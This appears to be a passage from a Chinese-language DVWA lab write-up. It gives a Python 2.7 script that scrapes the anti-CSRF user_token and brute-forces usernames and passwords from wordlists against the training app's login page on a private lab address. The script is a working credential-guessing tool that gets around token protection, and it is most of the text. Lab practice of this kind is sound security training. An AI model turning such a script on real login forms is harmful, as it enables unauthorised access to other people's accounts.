由於加入了Anti-CSRFtoken預防無腦爆破，這裡就不推薦用Burpsuite了，還是簡單用python寫個指令碼吧。

借用lonehand指令碼（python 2.7），使用者名稱為admin，對password引數進行爆破並列印結果，但因為版本問題，獲取user_token時需要做出相應調整。調整結果如下：(在原基礎上修改了TOKEN獲取方式，增加了使用者名稱猜解)

from bs4 import BeautifulSoup
import urllib2
header={
    'Host': '192.168.31.119',
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': 'http://192.168.31.119/DVWA-master/vulnerabilities/brute/',
    'Cookie': 'security=high; PHPSESSID=2afb7fbff91b87660e18dcd0ab1d0ea5',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'}
requrl = "http://192.168.31.119/DVWA-master/vulnerabilities/brute/"

def get_token(requrl,header):
    req = urllib2.Request(url=requrl,headers=header)
    response = urllib2.urlopen(req)
    print response.getcode(),
    the_page = response.read()
    print len(the_page)
    soup = BeautifulSoup(the_page,"html.parser")
    d = soup.find_all('input', attrs={'name':'user_token'})
    user_token = d[0].attrs['value']
    return user_token

user_token = get_token(requrl,header)
i=0
for userline in open("user.lst"):
    for line in open("pass.lst"):
        requrl = "http://192.168.31.119/DVWA-master/vulnerabilities/brute/"+"?username="+userline.strip()+"&password="+line.strip()+"&Login=Login&user_token="+user_token
        i = i + 1
        print i,userline.strip(),line.strip(), 
        user_token = get_token(requrl,header)